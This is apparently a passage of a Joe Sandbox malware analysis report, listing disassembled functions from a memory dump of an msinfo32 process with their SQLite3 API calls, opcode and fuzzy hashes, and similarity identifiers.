                                                                                                              • Opcode Fuzzy Hash: 1737f90baf50d2521ae1dc593781d909eda5858255945ce187c6c64706f916a3
                                                                                                              • Instruction Fuzzy Hash: C7316D75A083A5DBDB109F78C884B497BE0AFC5318F20C96CE8998B341C739E945CB81
                                                                                                              Function 61E36A7D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E36AA3
                                                                                                              • sqlite3_value_bytes.SQLITE3 ref: 61E36AAD
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E36AD7
                                                                                                              • sqlite3_value_bytes.SQLITE3 ref: 61E36AE2
                                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E36B22
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_result_error
                                                                                                              • String ID: null
                                                                                                              • API String ID: 1955785328-634125391
                                                                                                              • Opcode ID: a307b455a7832cc7adbb3807161a7e0f11ec572fab9c87a22e8e8cb3bb02dbc9
                                                                                                              • Instruction ID: 54e59339b9c72135ecaad64148762dcccad46be842a9f6555ebef41c48997ef4
                                                                                                              • Opcode Fuzzy Hash: a307b455a7832cc7adbb3807161a7e0f11ec572fab9c87a22e8e8cb3bb02dbc9
                                                                                                              • Instruction Fuzzy Hash: 931105B2B082A58BD7046E7ED484319FBE1EBC9328F24C57ED5948B350D235C996C782
                                                                                                              Function 61E2925D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 61E2820F: sqlite3_log.SQLITE3(?,?,?,?,?,61E282C2), ref: 61E2824A
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E2928C
                                                                                                              • sqlite3_value_text16le.SQLITE3 ref: 61E292A0
                                                                                                              • sqlite3_value_text16le.SQLITE3 ref: 61E292CE
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E292E2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_value_text16le$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                                              • String ID: bad parameter or other API misuse$out of memory
                                                                                                              • API String ID: 3568942437-948784999
                                                                                                              • Opcode ID: f4945485339147670e4c004698587dc208c807f59d7c688f69dd9b2b3ff93d84
                                                                                                              • Instruction ID: d82afb09e50e9443df222d924f56496f92ec826f9fe5884ffa15b112888f7676
                                                                                                              • Opcode Fuzzy Hash: f4945485339147670e4c004698587dc208c807f59d7c688f69dd9b2b3ff93d84
                                                                                                              • Instruction Fuzzy Hash: 20010076B043914BDB00EFF995D0959BBE8AF55658F25C8ADDD88CF305E730D8408751
                                                                                                              Function 61E3ED89 Relevance: 9.4, APIs: 6, Instructions: 376stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • strcmp.MSVCRT ref: 61E3F1A4
                                                                                                              • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 61E3F1DC
                                                                                                              • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 61E3F1F5
                                                                                                              • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 61E3F22C
                                                                                                              • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 61E3F245
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3F258
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_logstrcmp
                                                                                                              • String ID:
                                                                                                              • API String ID: 2202632817-0
                                                                                                              • Opcode ID: 337fce496a555f030f46d2f85ad825393adb812bb773da682ffeb852ebda34fe
                                                                                                              • Instruction ID: 08efd15ee68faca80b7c17646d878bfbcca89b55da891f94d866c04f371aa266
                                                                                                              • Opcode Fuzzy Hash: 337fce496a555f030f46d2f85ad825393adb812bb773da682ffeb852ebda34fe
                                                                                                              • Instruction Fuzzy Hash: 17F1F674A042598FDB04CFA9C88079DBBF1BF89318F24C529E859AB349E778D846CF41
                                                                                                              Function 61E1575E Relevance: 9.3, APIs: 6, Instructions: 262COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_msize$sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                              • String ID:
                                                                                                              • API String ID: 2585109301-0
                                                                                                              • Opcode ID: 93d25bf053b657a751bd64ffbef9af6981b4b89ab869b0dd51bc65de7b51a19e
                                                                                                              • Instruction ID: bb68ba126c959abcdf33b0796105834b34a27c872dae37dcc740edb6624b39dd
                                                                                                              • Opcode Fuzzy Hash: 93d25bf053b657a751bd64ffbef9af6981b4b89ab869b0dd51bc65de7b51a19e
                                                                                                              • Instruction Fuzzy Hash: CBB114B5A05206CFDB00CF68C48179AB7B1BF8A318F29C469DC59AB349D734E855CF90
                                                                                                              Function 61E92270 Relevance: 9.2, APIs: 6, Instructions: 220COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5ea8786b782671905a265634706bd2c512d6a86d3f0e66cfbfea1ee712d87fb0
                                                                                                              • Instruction ID: ed39ee10c3f9863965efb34ebd51796b4dc25ca01f3d3cb455a13f5d84e0f0f9
                                                                                                              • Opcode Fuzzy Hash: 5ea8786b782671905a265634706bd2c512d6a86d3f0e66cfbfea1ee712d87fb0
                                                                                                              • Instruction Fuzzy Hash: 968198B4A157168BDF00DFB8C48064DBBF6EB95340F28C929E984CB354E734E981CB92
                                                                                                              Function 61E3BE2C Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3BE4D
                                                                                                                • Part of subcall function 61E386AE: sqlite3_initialize.SQLITE3 ref: 61E386B4
                                                                                                                • Part of subcall function 61E386AE: sqlite3_vmprintf.SQLITE3 ref: 61E386CE
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3BF8D
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3BF95
                                                                                                                • Part of subcall function 61E38680: sqlite3_free.SQLITE3 ref: 61E3868F
                                                                                                                • Part of subcall function 61E38680: sqlite3_vmprintf.SQLITE3 ref: 61E386A1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_vmprintf$sqlite3_initializesqlite3_mprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 2044204354-0
                                                                                                              • Opcode ID: 54c9ab42b0eeb812746ccd390868a0a9b688f45bccd72afc8e5b82b6019f81ed
                                                                                                              • Instruction ID: 0c347f7ab6f7eee9f28b70dae4a8561805db4cfd601dd63803446b3dffee1511
                                                                                                              • Opcode Fuzzy Hash: 54c9ab42b0eeb812746ccd390868a0a9b688f45bccd72afc8e5b82b6019f81ed
                                                                                                              • Instruction Fuzzy Hash: 2B41E470E046599FCB00DFA9C880AAEBBF5AF89304F25C92EE859D7345E735D842CB51
                                                                                                              Function 61E357D3 Relevance: 9.1, APIs: 6, Instructions: 106COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_malloc.SQLITE3 ref: 61E357E3
                                                                                                                • Part of subcall function 61E1923C: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E18EC6,?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E19244
                                                                                                              • memcmp.MSVCRT ref: 61E35855
                                                                                                              • memcmp.MSVCRT ref: 61E3587A
                                                                                                              • memcmp.MSVCRT ref: 61E358A4
                                                                                                              • memcmp.MSVCRT ref: 61E358D3
                                                                                                              • memcmp.MSVCRT ref: 61E358FF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcmp$sqlite3_initializesqlite3_malloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 40721531-0
                                                                                                              • Opcode ID: 11721e68a221a4b1f25c428f01716bf07c5395836458da1e41caf455fe9f32cb
                                                                                                              • Instruction ID: f29a8b966ff10d4a9e2124cf652df0a987ea76a0d55ff523c9f6f51c1784dfde
                                                                                                              • Opcode Fuzzy Hash: 11721e68a221a4b1f25c428f01716bf07c5395836458da1e41caf455fe9f32cb
                                                                                                              • Instruction Fuzzy Hash: 2D414EB0A083558BE7049FAAC58035AFBF5EFC5358F25C82ED8988B390D775D585CB42
                                                                                                              Function 61E22B2A Relevance: 9.1, APIs: 6, Instructions: 72COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E22B4C
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E22B5A
                                                                                                              • sqlite3_value_bytes.SQLITE3 ref: 61E22B67
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E22B95
                                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E22BBF
                                                                                                              • sqlite3_result_int.SQLITE3 ref: 61E22BFF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_value_text$sqlite3_result_errorsqlite3_result_intsqlite3_value_bytes
                                                                                                              • String ID:
                                                                                                              • API String ID: 4226599549-0
                                                                                                              • Opcode ID: 385d8339e7263b943fa932d1d9d94d4f70d6dec693843a0a90fb193d35565cc1
                                                                                                              • Instruction ID: 9d91acefac069c2591706e46c683e960ab6d1f18b021c97ef5b79cf00f4f2c6c
                                                                                                              • Opcode Fuzzy Hash: 385d8339e7263b943fa932d1d9d94d4f70d6dec693843a0a90fb193d35565cc1
                                                                                                              • Instruction Fuzzy Hash: D4213A7091474A8FCB10DFB9C494699BBF0AF98324F24C91DE8A99B390D334D941CF51
                                                                                                              Function 61E4C773 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_reset.SQLITE3 ref: 61E4C79B
                                                                                                                • Part of subcall function 61E4C593: sqlite3_mutex_enter.SQLITE3 ref: 61E4C5B0
                                                                                                                • Part of subcall function 61E4C593: sqlite3_mutex_leave.SQLITE3 ref: 61E4C631
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4C7B1
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4C7C6
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4C7D0
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4C7E4
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4C7FE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_finalizesqlite3_mutex_entersqlite3_mutex_leavesqlite3_reset
                                                                                                              • String ID:
                                                                                                              • API String ID: 947960732-0
                                                                                                              • Opcode ID: 507f9b01e2d77094e4a50b71029e46e1da40f13820df4d50c473148a73e0e926
                                                                                                              • Instruction ID: 30e4e76b4742adea374b925481f0268fb136e4b254831efe3e4745d90e74f9c6
                                                                                                              • Opcode Fuzzy Hash: 507f9b01e2d77094e4a50b71029e46e1da40f13820df4d50c473148a73e0e926
                                                                                                              • Instruction Fuzzy Hash: 7D118E30604A459FD700DFB9D084B05FBE0BF84328F25C569D8588B755E774E895CB91
                                                                                                              Function 61E3A035 Relevance: 9.1, APIs: 6, Instructions: 54COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3A04C
                                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E3A07B
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3A090
                                                                                                              • sqlite3_load_extension.SQLITE3 ref: 61E3A0AB
                                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E3A0C6
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3A0D1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_result_errorsqlite3_value_text$sqlite3_freesqlite3_load_extension
                                                                                                              • String ID:
                                                                                                              • API String ID: 356667613-0
                                                                                                              • Opcode ID: 82f29e294c006e0a66d2724ac452cb6e922045e58a274f490dccc1ecf8289a70
                                                                                                              • Instruction ID: 34263b204d0d6431ce1897fa9f4f03f6577fc8211e789d3ce030e47db2cf8bef
                                                                                                              • Opcode Fuzzy Hash: 82f29e294c006e0a66d2724ac452cb6e922045e58a274f490dccc1ecf8289a70
                                                                                                              • Instruction Fuzzy Hash: DA11F4B59087569BCB00AF69C08465EFBF1AFC8324F20CA1DE8A88B360D774D481CF51
                                                                                                              Function 61E0EC71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_strglob
                                                                                                              • String ID: $
                                                                                                              • API String ID: 476814121-227171996
                                                                                                              • Opcode ID: c6a789e1158964ee87cf33fd60a53fd1610fffe9284178f90ba3bcd9c2297618
                                                                                                              • Instruction ID: 109f5857108a87843c599e57038eff77b2f8c46b68542bdac58fe488d1018c54
                                                                                                              • Opcode Fuzzy Hash: c6a789e1158964ee87cf33fd60a53fd1610fffe9284178f90ba3bcd9c2297618
                                                                                                              • Instruction Fuzzy Hash: 36210230508BC64AD7268FBAC6C0359BFE4EF56319F28C4BDC4958A290E334D861C743
                                                                                                              Function 61E1960E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_malloc.SQLITE3 ref: 61E19628
                                                                                                                • Part of subcall function 61E1923C: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E18EC6,?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E19244
                                                                                                              • sqlite3_stricmp.SQLITE3 ref: 61E19670
                                                                                                              • sqlite3_stricmp.SQLITE3 ref: 61E19697
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E196C5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_stricmp$sqlite3_freesqlite3_initializesqlite3_malloc
                                                                                                              • String ID: `Pa
                                                                                                              • API String ID: 2308590742-2867136586
                                                                                                              • Opcode ID: f8570ba3eaa02ecb4d69ff296078f9da58a406b9b54a49e80b9fce7dd43101d3
                                                                                                              • Instruction ID: d8ebd9a20a2bd40a04bcd9ceae14b64570107acfe3506597d4c4aada30ccbaad
